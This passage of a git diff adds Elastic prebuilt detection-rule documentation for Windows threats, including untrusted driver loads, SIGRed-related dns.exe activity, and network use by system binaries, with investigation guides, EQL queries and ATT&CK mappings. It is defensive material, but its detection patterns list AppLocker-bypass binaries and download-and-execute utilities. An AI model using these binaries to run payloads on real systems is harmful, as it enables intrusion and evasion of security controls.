+ "?:\\Windows\\SKB\\*.dll", + "?:\\Windows\\Vss\\*.dll", + "?:\\Windows\\Web\\*.dll", + "?:\\Windows\\servicing\\*.dll", + "?:\\Windows\\CbsTemp\\*.dll", + "?:\\Windows\\Logs\\*.dll", + "?:\\Windows\\WaaS\\*.dll", + "?:\\Windows\\twain_32\\*.dll", + "?:\\Windows\\ShellExperiences\\*.dll", + "?:\\Windows\\ShellComponents\\*.dll", + "?:\\Windows\\PLA\\*.dll", + "?:\\Windows\\Migration\\*.dll", + "?:\\Windows\\debug\\*.dll", + "?:\\Windows\\Cursors\\*.dll", + "?:\\Windows\\Containers\\*.dll", + "?:\\Windows\\Boot\\*.dll", + "?:\\Windows\\bcastdvr\\*.dll", + "?:\\Windows\\TextInput\\*.dll", + "?:\\Windows\\schemas\\*.dll", + "?:\\Windows\\SchCache\\*.dll", + "?:\\Windows\\Resources\\*.dll", + "?:\\Windows\\rescache\\*.dll", + "?:\\Windows\\Provisioning\\*.dll", + "?:\\Windows\\PrintDialog\\*.dll", + "?:\\Windows\\PolicyDefinitions\\*.dll", + "?:\\Windows\\media\\*.dll", + "?:\\Windows\\Globalization\\*.dll", + "?:\\Windows\\L2Schemas\\*.dll", + "?:\\Windows\\LiveKernelReports\\*.dll", + "?:\\Windows\\ModemLogs\\*.dll", + "?:\\Windows\\ImmersiveControlPanel\\*.dll", + "?:\\$Recycle.Bin\\*.dll") and + + /* DLL loaded from the process.executable current directory */ + endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1))) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: DLL Side-Loading +** ID: T1574.002 +** Reference URL: https://attack.mitre.org/techniques/T1574/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-untrusted-driver-loaded.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-untrusted-driver-loaded.asciidoc new file mode 100644 index 0000000000..743c082dca --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-untrusted-driver-loaded.asciidoc @@ -0,0 +1,135 @@ +[[prebuilt-rule-8-10-5-untrusted-driver-loaded]] +=== Untrusted Driver Loaded + +Identifies attempt to load an untrusted driver. Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/hfiref0x/TDL +* https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Untrusted Driver Loaded + +Microsoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. + +This protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security. + +This rule identifies an attempt to load an untrusted driver, which effectively means that DSE was disabled or bypassed. This can indicate that the system was compromised. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context: + - Identify the path that the driver was loaded from. If you're using Elastic Defend, path information can be found in the `dll.path` field. + - Examine the file creation and modification timestamps: + - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` fields. The values are in seconds. + - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation. + - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes. + - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Use Osquery to investigate the drivers loaded into the system. + - !{osquery{"label":"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \"Microsoft\" AND signed == \"1\")\n"}} + - !{osquery{"label":"Osquery - Retrieve All Unsigned Drivers with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \"0\"\n"}} +- Identify the driver's `Device Name` and `Service Name`. +- Check for alerts from the rules specified in the `Related Rules` section. + +### False positive analysis + +- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk. + +### Related Rules + +- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9 +- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd +- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.) +- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed. + - This can be done via PowerShell `Remove-Service` cmdlet. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Ensure that the Driver Signature Enforcement is enabled on the system. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +driver where host.os.type == "windows" and process.pid == 4 and + dll.code_signature.trusted != true and + not dll.code_signature.status : ("errorExpired", "errorRevoked") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-child-process-of-dns-exe.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-child-process-of-dns-exe.asciidoc new file mode 100644 index 0000000000..60e48b20c8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-child-process-of-dns-exe.asciidoc @@ -0,0 +1,113 @@ +[[prebuilt-rule-8-10-5-unusual-child-process-of-dns-exe]] +=== Unusual Child Process of dns.exe + +Identifies an unexpected process spawning from dns.exe, the process responsible for Windows DNS server services, which may indicate activity related to remote code execution or other forms of exploitation. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/ +* https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/ +* https://github.com/maxpl0it/CVE-2020-1350-DoS +* https://www.elastic.co/security-labs/detection-rules-for-sigred-vulnerability + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Unusual Child Process of dns.exe + +SIGRed (CVE-2020-1350) is a wormable, critical vulnerability in the Windows DNS server that affects Windows Server versions 2003 to 2019 and can be triggered by a malicious DNS response. Because the service is running in elevated privileges (SYSTEM), an attacker that successfully exploits it is granted Domain Administrator rights. This can effectively compromise the entire corporate infrastructure. + +This rule looks for unusual children of the `dns.exe` process, which can indicate the exploitation of the SIGRed or a similar remote code execution vulnerability in the DNS server. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. + - Any suspicious or abnormal child process spawned from dns.exe should be carefully reviewed and investigated. It's impossible to predict what an adversary may deploy as the follow-on process after the exploit, but built-in discovery/enumeration utilities should be top of mind (`whoami.exe`, `netstat.exe`, `systeminfo.exe`, `tasklist.exe`). + - Built-in Windows programs that contain capabilities used to download and execute additional payloads should also be considered. This is not an exhaustive list, but ideal candidates to start out would be: `mshta.exe`, `powershell.exe`, `regsvr32.exe`, `rundll32.exe`, `wscript.exe`, `wmic.exe`. + - If a denial-of-service (DoS) exploit is successful and DNS Server service crashes, be mindful of potential child processes related to `werfault.exe` occurring. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Investigate other alerts associated with the host during the past 48 hours. +- Check whether the server is vulnerable to CVE-2020-1350. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Reimage the host operating system or restore the compromised server to a clean state. +- Install the latest patches on systems that run Microsoft DNS Server. +- Consider the implementation of a patch management system, such as the Windows Server Update Services (WSUS). +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Review the privileges assigned to the user to ensure that the least privilege principle is being followed. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "dns.exe" and + not process.name : "conhost.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Exploitation of Remote Services +** ID: T1210 +** Reference URL: https://attack.mitre.org/techniques/T1210/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-executable-file-creation-by-a-system-critical-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-executable-file-creation-by-a-system-critical-process.asciidoc new file mode 100644 index 0000000000..cac3f2c790 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-executable-file-creation-by-a-system-critical-process.asciidoc @@ -0,0 +1,139 @@ +[[prebuilt-rule-8-10-5-unusual-executable-file-creation-by-a-system-critical-process]] +=== Unusual Executable File Creation by a System Critical Process + +Identifies an unexpected executable file being created or modified by a Windows system critical process, which may indicate activity related to remote code execution or other forms of exploitation. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Unusual Executable File Creation by a System Critical Process + +Windows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations. + +This rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type != "deletion" and + file.extension : ("exe", "dll") and + process.name : ("smss.exe", + "autochk.exe", + "csrss.exe", + "wininit.exe", + "services.exe", + "lsass.exe", + "winlogon.exe", + "userinit.exe", + "LogonUI.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Exploitation for Defense Evasion +** ID: T1211 +** Reference URL: https://attack.mitre.org/techniques/T1211/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Exploitation for Client Execution +** ID: T1203 +** Reference URL: https://attack.mitre.org/techniques/T1203/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-file-modification-by-dns-exe.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-file-modification-by-dns-exe.asciidoc new file mode 100644 index 0000000000..1997fa1413 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-file-modification-by-dns-exe.asciidoc @@ -0,0 +1,83 @@ +[[prebuilt-rule-8-10-5-unusual-file-modification-by-dns-exe]] +=== Unusual File Modification by dns.exe + +Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/ +* https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/ +* https://www.elastic.co/security-labs/detection-rules-for-sigred-vulnerability + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Unusual File Write +Detection alerts from this rule indicate potential unusual/abnormal file writes from the DNS Server service process (`dns.exe`) after exploitation from CVE-2020-1350 (SigRed) has occurred. Here are some possible avenues of investigation: +- Post-exploitation, adversaries may write additional files or payloads to the system as additional discovery/exploitation/persistence mechanisms. +- Any suspicious or abnormal files written from `dns.exe` should be reviewed and investigated with care. +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and process.name : "dns.exe" and event.type in ("creation", "deletion", "change") and + not file.name : "dns.log" and not + (file.extension : ("old", "temp", "bak", "dns", "arpa") and file.path : "C:\\Windows\\System32\\dns\\*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Exploitation of Remote Services +** ID: T1210 +** Reference URL: https://attack.mitre.org/techniques/T1210/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-network-activity-from-a-windows-system-binary.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-network-activity-from-a-windows-system-binary.asciidoc new file mode 100644 index 0000000000..96531fe834 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-network-activity-from-a-windows-system-binary.asciidoc @@ -0,0 +1,189 @@ +[[prebuilt-rule-8-10-5-unusual-network-activity-from-a-windows-system-binary]] +=== Unusual Network Activity from a Windows System Binary + +Identifies network activity from unexpected system applications. This may indicate adversarial activity as these applications are often leveraged by adversaries to execute code and evade detection. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Unusual Network Activity from a Windows System Binary + +Attackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution. + +This rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. + - If the malicious file was delivered via phishing: + - Block the email sender from sending future emails. + - Block the malicious web pages. + - Remove emails from the sender from mailboxes. + - Consider improvements to the security awareness program. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan=5m + [process where host.os.type == "windows" and event.type == "start" and + + /* known applocker bypasses */ + (process.name : "bginfo.exe" or + process.name : "cdb.exe" or + process.name : "control.exe" or + process.name : "cmstp.exe" or + process.name : "csi.exe" or + process.name : "dnx.exe" or + process.name : "fsi.exe" or + process.name : "ieexec.exe" or + process.name : "iexpress.exe" or + process.name : "installutil.exe" or + process.name : "Microsoft.Workflow.Compiler.exe" or + process.name : "MSBuild.exe" or + process.name : "msdt.exe" or + process.name : "mshta.exe" or + process.name : "msiexec.exe" or + process.name : "msxsl.exe" or + process.name : "odbcconf.exe" or + process.name : "rcsi.exe" or + process.name : "regsvr32.exe" or + process.name : "xwizard.exe")] + [network where + (process.name : "bginfo.exe" or + process.name : "cdb.exe" or + process.name : "control.exe" or + process.name : "cmstp.exe" or + process.name : "csi.exe" or + process.name : "dnx.exe" or + process.name : "fsi.exe" or + process.name : "ieexec.exe" or + process.name : "iexpress.exe" or + process.name : "installutil.exe" or + process.name : "Microsoft.Workflow.Compiler.exe" or + process.name : "MSBuild.exe" or + process.name : "msdt.exe" or + process.name : "mshta.exe" or + ( + process.name : "msiexec.exe" and not + dns.question.name : ( + "ocsp.digicert.com", "ocsp.verisign.com", "ocsp.comodoca.com", "ocsp.entrust.net", "ocsp.usertrust.com", + "ocsp.godaddy.com", "ocsp.camerfirma.com", "ocsp.globalsign.com", "ocsp.sectigo.com", "*.local" + ) + ) or + process.name : "msxsl.exe" or + process.name : "odbcconf.exe" or + process.name : "rcsi.exe" or + process.name : "regsvr32.exe" or + process.name : "xwizard.exe")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ +* Sub-technique: +** Name: Mshta +** ID: T1218.005 +** Reference URL: https://attack.mitre.org/techniques/T1218/005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-persistence-via-services-registry.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-persistence-via-services-registry.asciidoc new file mode 100644 index 0000000000..e36f82def6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-persistence-via-services-registry.asciidoc @@ -0,0 +1,94 @@ +[[prebuilt-rule-8-10-5-unusual-persistence-via-services-registry]] +=== Unusual Persistence via Services Registry + +Identifies processes modifying the services registry key directly, instead of through the expected Windows APIs. This could be an indication of an adversary attempting to stealthily persist through abnormal service creation or modification of an existing service. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and + registry.path : ( + "HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ServiceDLL", + 